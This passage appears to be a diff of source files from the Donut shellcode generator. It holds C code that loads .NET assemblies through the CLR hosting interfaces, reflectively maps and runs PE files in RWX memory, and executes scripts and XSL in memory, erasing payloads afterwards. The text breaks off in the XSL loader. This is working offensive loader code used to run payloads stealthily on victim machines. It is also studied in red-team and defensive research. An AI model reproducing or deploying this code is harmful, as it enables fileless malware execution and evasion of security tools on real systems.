5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
32 PDONUT_MODULE mod;
33 HRESULT hr = S_OK;
34 BSTR domain;
35 SAFEARRAYBOUND sab;
36 SAFEARRAY *sa;
37 DWORD i;
38 BOOL loaded=FALSE, loadable;
39 PBYTE p;
40
41 if(inst->type == DONUT_INSTANCE_PIC) {
42 DPRINT("Using module embedded in instance");
43 mod = (PDONUT_MODULE)&inst->module.x;
44 } else {
45 DPRINT("Loading module from allocated memory");
46 mod = inst->module.p;
47 }
48
49 if(inst->api.CLRCreateInstance != NULL) {
50 DPRINT("CLRCreateInstance");
51
52 hr = inst->api.CLRCreateInstance(
53 (REFCLSID)&inst->xCLSID_CLRMetaHost,
54 (REFIID)&inst->xIID_ICLRMetaHost,
55 (LPVOID*)&pa->icmh);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
59
60 hr = pa->icmh->lpVtbl->GetRuntime(
61 pa->icmh, mod->runtime,
62 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
63
64 if(SUCCEEDED(hr)) {
65 DPRINT("ICLRRuntimeInfo::IsLoadable");
66 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
67
68 if(SUCCEEDED(hr) && loadable) {
69 DPRINT("ICLRRuntimeInfo::GetInterface");
70
71 hr = pa->icri->lpVtbl->GetInterface(
72 pa->icri,
73 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
74 (REFIID)&inst->xIID_ICorRuntimeHost,
75 (LPVOID)&pa->icrh);
76
77 DPRINT("HRESULT: %08lx", hr);
78 }
79 } else pa->icri = NULL;
80 } else pa->icmh = NULL;
81 }
82 if(FAILED(hr)) {
83 DPRINT("CorBindToRuntime");
84
85 hr = inst->api.CorBindToRuntime(
86 NULL, // load whatever's available
87 NULL, // load workstation build
88 &inst->xCLSID_CorRuntimeHost,
89 &inst->xIID_ICorRuntimeHost,
90 (LPVOID*)&pa->icrh);
91
92 DPRINT("HRESULT: %08lx", hr);
93 }
94
95 if(FAILED(hr)) {
96 pa->icrh = NULL;
97 return FALSE;
98 }
99 DPRINT("ICorRuntimeHost::Start");
100
101 hr = pa->icrh->lpVtbl->Start(pa->icrh);
102
103 if(SUCCEEDED(hr)) {
104 domain = inst->api.SysAllocString(mod->domain);
105
106 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
107
108 hr = pa->icrh->lpVtbl->CreateDomain(
109 pa->icrh, domain, NULL, &pa->iu);
110
111 inst->api.SysFreeString(domain);
112
113 if(SUCCEEDED(hr)) {
114 DPRINT("IUnknown::QueryInterface");
115
116 hr = pa->iu->lpVtbl->QueryInterface(
117 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
118
119 if(SUCCEEDED(hr)) {
120 sab.lLbound = 0;
121 sab.cElements = mod->len;
122 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
123
124 if(sa != NULL) {
125 DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
126
127 for(i=0, p=sa->pvData; i<mod->len; i++) {
128 p[i] = mod->data[i];
129 }
130
131 DPRINT("AppDomain::Load_3");
132
133 hr = pa->ad->lpVtbl->Load_3(
134 pa->ad, sa, &pa->as);
135
136 loaded = hr == S_OK;
137
138 DPRINT("HRESULT : %08lx", hr);
139
140 DPRINT("Erasing assembly from memory");
141
142 for(i=0, p=sa->pvData; i<mod->len; i++) {
143 p[i] = mod->data[i] = 0;
144 }
145
146 DPRINT("SafeArrayDestroy");
147 inst->api.SafeArrayDestroy(sa);
148 }
149 }
150 }
151 }
152 return loaded;
153 }
154
155 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
156 SAFEARRAY *sav=NULL, *params=NULL;
157 VARIANT arg, ret, vtPsa, v1={0}, v2;
158 DWORD i;
159 PDONUT_MODULE mod;
160 HRESULT hr;
161 BSTR cls, method;
162 ULONG cnt;
163 OLECHAR str[1]={0};
164 LONG ucnt, lcnt;
165
166 if(inst->type == DONUT_INSTANCE_PIC) {
167 DPRINT("Using module embedded in instance");
168 mod = (PDONUT_MODULE)&inst->module.x;
169 } else {
170 DPRINT("Loading module from allocated memory");
171 mod = inst->module.p;
172 }
173
174 DPRINT("Type is %s",
175 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
176
177 // if this is a program
178 if(mod->type == DONUT_MODULE_NET_EXE) {
179 // get the entrypoint
180 DPRINT("MethodInfo::EntryPoint");
181 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
182
183 if(SUCCEEDED(hr)) {
184 // get the parameters for entrypoint
185 DPRINT("MethodInfo::GetParameters");
186 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
187
188 if(SUCCEEDED(hr)) {
189 DPRINT("SafeArrayGetLBound");
190 hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
191
192 DPRINT("SafeArrayGetUBound");
193 hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
194 cnt = ucnt - lcnt + 1;
195 DPRINT("Number of parameters for entrypoint : %i", cnt);
196
197 // does Main require string[] args?
198 if(cnt != 0) {
199 // create a 1 dimensional array for Main parameters
200 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
201 // if user specified their own parameters, add to string array
202 if(mod->param_cnt != 0) {
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
206
207 // add each string parameter
208 for(i=0; i<mod->param_cnt; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
210
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(mod->param[i]));
213 }
214 } else {
215 DPRINT("Adding empty string for invoke_3");
216 // add empty string to make it work
217 // create 1 dimensional array for strings[] args
218 vtPsa.vt = (VT_ARRAY | VT_BSTR);
219 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
220
221 i=0;
222 inst->api.SafeArrayPutElement(vtPsa.parray,
223 &i, inst->api.SysAllocString(str));
224 }
225 // add string array to list of parameters
226 i=0;
227 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
228 }
229 v1.vt = VT_NULL;
230 v1.plVal = NULL;
231
232 DPRINT("MethodInfo::Invoke_3()\n");
233
234 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
235
236 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
237 hr, SUCCEEDED(hr) ? "Success" : "Failed");
238
239 if(sav != NULL) {
240 inst->api.SafeArrayDestroy(vtPsa.parray);
241 inst->api.SafeArrayDestroy(sav);
242 }
243 }
244 } else pa->mi = NULL;
245 } else {
246 DPRINT("SysAllocString(\"%ws\")", mod->cls);
247 cls = inst->api.SysAllocString(mod->cls);
248 if(cls == NULL) return FALSE;
249
250 DPRINT("SysAllocString(\"%ws\")", mod->method);
251 method = inst->api.SysAllocString(mod->method);
252
253 if(method != NULL) {
254 DPRINT("Assembly::GetType_2");
255 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
256
257 if(SUCCEEDED(hr)) {
258 sav = NULL;
259 if(mod->param_cnt != 0) {
260 DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
261
262 sav = inst->api.SafeArrayCreateVector(
263 VT_VARIANT, 0, mod->param_cnt);
264
265 if(sav != NULL) {
266 for(i=0; i<mod->param_cnt; i++) {
267 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
268
269 V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
270 V_VT(&arg) = VT_BSTR;
271
272 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
273
274 if(FAILED(hr)) {
275 DPRINT("SafeArrayPutElement failed.");
276 inst->api.SafeArrayDestroy(sav);
277 sav = NULL;
278 }
279 }
280 }
281 }
282 if(SUCCEEDED(hr)) {
283 DPRINT("Calling Type::InvokeMember_3");
284
285 hr = pa->type->lpVtbl->InvokeMember_3(
286 pa->type,
287 method, // name of method
288 BindingFlags_InvokeMethod |
289 BindingFlags_Static |
290 BindingFlags_Public,
291 NULL,
292 v1, // empty VARIANT
293 sav, // arguments to method
294 &ret); // return code from method
295
296 DPRINT("Type::InvokeMember_3 : %08lx : %s",
297 hr, SUCCEEDED(hr) ? "Success" : "Failed");
298
299 if(sav != NULL) {
300 inst->api.SafeArrayDestroy(sav);
301 }
302 }
303 }
304 inst->api.SysFreeString(method);
305 }
306 inst->api.SysFreeString(cls);
307 }
308 return TRUE;
309 }
310
311 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
312
313 if(pa->type != NULL) {
314 DPRINT("Type::Release");
315 pa->type->lpVtbl->Release(pa->type);
316 pa->type = NULL;
317 }
318
319 if(pa->mi != NULL) {
320 DPRINT("MethodInfo::Release");
321 pa->mi->lpVtbl->Release(pa->mi);
322 pa->mi = NULL;
323 }
324
325 if(pa->as != NULL) {
326 DPRINT("Assembly::Release");
327 pa->as->lpVtbl->Release(pa->as);
328 pa->as = NULL;
329 }
330
331 if(pa->ad != NULL) {
332 DPRINT("AppDomain::Release");
333 pa->ad->lpVtbl->Release(pa->ad);
334 pa->ad = NULL;
335 }
336
337 if(pa->iu != NULL) {
338 DPRINT("IUnknown::Release");
339 pa->iu->lpVtbl->Release(pa->iu);
340 pa->iu = NULL;
341 }
342
343 if(pa->icrh != NULL) {
344 DPRINT("ICorRuntimeHost::Stop");
345 pa->icrh->lpVtbl->Stop(pa->icrh);
346
347 DPRINT("ICorRuntimeHost::Release");
348 pa->icrh->lpVtbl->Release(pa->icrh);
349 pa->icrh = NULL;
350 }
351
352 if(pa->icri != NULL) {
353 DPRINT("ICLRRuntimeInfo::Release");
354 pa->icri->lpVtbl->Release(pa->icri);
355 pa->icri = NULL;
356 }
357
358 if(pa->icmh != NULL) {
359 DPRINT("ICLRMetaHost::Release");
360 pa->icmh->lpVtbl->Release(pa->icmh);
361 pa->icmh = NULL;
362 }
363 }
+0
-249
payload/inmem_pe.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(VOID);
44
45 typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
46
47 // same as strcmp
48 int xstrcmp(char *s1, char *s2) {
49 while(*s1 && (*s1==*s2))s1++,s2++;
50 return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
51 }
52
53 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
54 VOID RunPE(PDONUT_INSTANCE inst) {
55 PIMAGE_DOS_HEADER dos, doshost;
56 PIMAGE_NT_HEADERS nt, nthost;
57 PIMAGE_SECTION_HEADER sh;
58 PIMAGE_THUNK_DATA oft, ft;
59 PIMAGE_IMPORT_BY_NAME ibn;
60 PIMAGE_IMPORT_DESCRIPTOR imp;
61 PIMAGE_EXPORT_DIRECTORY exp;
62 PIMAGE_RELOC list;
63 PIMAGE_BASE_RELOCATION ibr;
64 DWORD rva;
65 PDWORD adr;
66 PDWORD sym;
67 PWORD ord;
68 PBYTE ofs;
69 PCHAR str, name;
70 HMODULE dll;
71 ULONG_PTR ptr;
72 DllMain_t DllMain; // DLL
73 Start_t Start; // EXE
74 call_stub_t CallApi; // DLL function
75 LPVOID cs = NULL, base, host;
76 DWORD i, cnt;
77 PDONUT_MODULE mod;
78 FARPROC api=NULL; // DLL export
79
80 // write shellcode to stack. msvc sux!!
81 #include "call_api_bin.h"
82
83 if(inst->type == DONUT_INSTANCE_PIC) {
84 DPRINT("Using module embedded in instance");
85 mod = (PDONUT_MODULE)&inst->module.x;
86 } else {
87 DPRINT("Loading module from allocated memory");
88 mod = inst->module.p;
89 }
90
91 base = mod->data;
92 dos = (PIMAGE_DOS_HEADER)base;
93 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
94
95 // before doing anything. check compatibility between exe/dll and host process.
96 host = inst->api.GetModuleHandle(NULL);
97 doshost = (PIMAGE_DOS_HEADER)host;
98 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
99
100 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
101 DPRINT("Host process and payload are not compatiable...cannot load.");
102 return;
103 }
104
105 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
106 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
107
108 cs = inst->api.VirtualAlloc(
109 NULL, nt->OptionalHeader.SizeOfImage + 4096,
110 MEM_COMMIT | MEM_RESERVE,
111 PAGE_EXECUTE_READWRITE);
112
113 if(cs == NULL) return;
114
115 DPRINT("Copying each section to RWX memory %p", cs);
116 sh = IMAGE_FIRST_SECTION(nt);
117
118 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
119 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
120 (PBYTE)base + sh[i].PointerToRawData,
121 sh[i].SizeOfRawData);
122 }
123
124 DPRINT("Processing the Import Table");
125 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
126 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
127
128 // For each DLL
129 for (;imp->Name!=0; imp++) {
130 name = RVA2VA(PCHAR, cs, imp->Name);
131
132 DPRINT("Loading %s", name);
133 dll = inst->api.LoadLibraryA(name);
134
135 // Resolve the API for this library
136 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
137 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
138
139 // For each API
140 for (;; oft++, ft++) {
141 // No API left?
142 if (oft->u1.AddressOfData == 0) break;
143
144 PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
145
146 // Resolve by ordinal?
147 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
148 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
149 } else {
150 // Resolve by name
151 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
152 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
153 }
154 }
155 }
156
157 DPRINT("Applying Relocations");
158 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
159 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
160 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
161
162 while(ibr->VirtualAddress != 0) {
163 list = (PIMAGE_RELOC)(ibr + 1);
164
165 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
166 if(list->type == IMAGE_REL_TYPE) {
167 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
168 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
169 DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
170 goto pe_cleanup;
171 }
172 list++;
173 }
174 ibr = (PIMAGE_BASE_RELOCATION)list;
175 }
176
177 if(mod->type == DONUT_MODULE_DLL) {
178 // call exported api?
179 if(mod->method[0] != 0) {
180 DPRINT("Resolving address of %s", (char*)mod->method);
181
182 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
183
184 if(rva != 0) {
185 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
186 cnt = exp->NumberOfNames;
187
188 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
189
190 if(cnt != 0) {
191 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
192 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
193 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
194
195 do {
196 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
197 if(!xstrcmp(str, (char*)mod->method)) {
198 api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
199 break;
200 }
201 } while (--cnt);
202
203 if(api != NULL) {
204 CallApi = inst->api.VirtualAlloc(
205 NULL,
206 sizeof(CALL_API_BIN),
207 MEM_COMMIT | MEM_RESERVE,
208 PAGE_EXECUTE_READWRITE);
209
210 if(CallApi != NULL) {
211 DPRINT("Calling %s via code stub.", (char*)mod->method);
212 Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
213 CallApi(api, mod->param_cnt, mod->param);
214 DPRINT("Erasing code stub");
215 Memset(CallApi, 0, sizeof(CALL_API_BIN));
216 inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
217 }
218 } else {
219 DPRINT("Unable to resolve API");
220 goto pe_cleanup;
221 }
222 }
223 }
224 } else {
225 DPRINT("Executing entrypoint of DLL\n\n");
226 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
227 DllMain(host, DLL_PROCESS_ATTACH, NULL);
228 }
229 } else {
230 // The problem with executing EXE files:
231 // 1) They use subsystems either GUI or CUI
232 // 2) They call ExitProcess ...will need to review support of this later.
233 DPRINT("Executing entrypoint of EXE\n\n");
234 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
235 Start();
236 }
237 pe_cleanup:
238 // if memory allocated
239 if(cs != NULL) {
240 // DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
241 // nt->OptionalHeader.SizeOfImage, cs);
242 // erase from memory (disabled for now)
243 // Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
244 // release
245 DPRINT("Releasing memory");
246 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
247 }
248 }
+0
-156
payload/inmem_script.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IHostVtbl wscript_vtbl;
38 PDONUT_MODULE mod;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43
44 if(inst->type == DONUT_INSTANCE_PIC) {
45 DPRINT("Using module embedded in instance");
46 mod = (PDONUT_MODULE)&inst->module.x;
47 } else {
48 DPRINT("Loading module from allocated memory");
49 mod = inst->module.p;
50 }
51
52 // 1. Allocate memory for unicode format of script
53 script = (PWCHAR)inst->api.VirtualAlloc(
54 NULL,
55 (inst->mod_len + 1) * sizeof(WCHAR),
56 MEM_COMMIT | MEM_RESERVE,
57 PAGE_READWRITE);
58
59 // 2. Convert string to unicode.
60 if(script != NULL) {
61 // 2. Convert string to unicode.
62 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
63 -1, script, mod->len * sizeof(WCHAR));
64
65 // we're using stack memory for the virtual function table
66 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
67 ActiveScript_New(inst, &mas.site);
68
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 mas.siteWnd.lpVtbl = NULL;
73
74 // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
75 DPRINT("CoInitializeEx");
76 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
77
78 if(hr == S_OK) {
79 // 5. Instantiate the active script engine
80 DPRINT("CoCreateInstance(IID_IActiveScript)");
81
82 hr = inst->api.CoCreateInstance(
83 &inst->xCLSID_ScriptLanguage, 0,
84 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
85 &inst->xIID_IActiveScript, (void **)&engine);
86
87 if(hr == S_OK) {
88 // 6. Get IActiveScriptParse object from engine
89 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
90
91 hr = engine->lpVtbl->QueryInterface(
92 engine,
93 #ifdef _WIN64
94 &inst->xIID_IActiveScriptParse64,
95 #else
96 &inst->xIID_IActiveScriptParse32,
97 #endif
98 (void **)&parser);
99
100 if(hr == S_OK) {
101 // 7. Initialize parser
102 DPRINT("IActiveScriptParse::InitNew");
103 hr = parser->lpVtbl->InitNew(parser);
104
105 if(hr == S_OK) {
106 // 8. Set custom script interface
107 DPRINT("IActiveScript::SetScriptSite");
108 mas.wscript.lpEngine = engine;
109
110 hr = engine->lpVtbl->SetScriptSite(
111 engine, (IActiveScriptSite *)&mas);
112
113 if(hr == S_OK) {
114 DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
115 obj = inst->api.SysAllocString(inst->wscript);
116 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
117 inst->api.SysFreeString(obj);
118
119 if(hr == S_OK) {
120 // 9. Load script
121 DPRINT("IActiveScriptParse::ParseScriptText");
122 hr = parser->lpVtbl->ParseScriptText(
123 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
124
125 if(hr == S_OK) {
126 // 10. Run script
127 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
128 hr = engine->lpVtbl->SetScriptState(
129 engine, SCRIPTSTATE_CONNECTED);
130
131 // SetScriptState blocks here
132 }
133 }
134 }
135 }
136 DPRINT("IActiveScriptParse::Release");
137 parser->lpVtbl->Release(parser);
138 }
139 DPRINT("IActiveScript::Close");
140 engine->lpVtbl->Close(engine);
141
142 DPRINT("IActiveScript::Release");
143 engine->lpVtbl->Release(engine);
144 }
145 }
146 DPRINT("Erasing script from memory");
147 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
148
149 DPRINT("VirtualFree(script)");
150 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
151 }
152 }
153
154 #include "activescript.c"
155 #include "wscript.c"
+0
-109
payload/inmem_xsl.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunXSL(PDONUT_INSTANCE inst) {
32 IXMLDOMDocument *pDoc;
33 IXMLDOMNode *pNode;
34 HRESULT hr;
35 PWCHAR xsl_str;
36 VARIANT_BOOL loaded;
37 BSTR res;
38 PDONUT_MODULE mod;
39 ULONG64 len;
40 UCHAR c;
41
42 if(inst->type == DONUT_INSTANCE_PIC) {
43 DPRINT("Using module embedded in instance");
44 mod = (PDONUT_MODULE)&inst->module.x;
45 } else {
46 DPRINT("Loading module from allocated memory");
47 mod = inst->module.p;
48 }
49
50 // 1. Allocate RW memory for unicode format of script
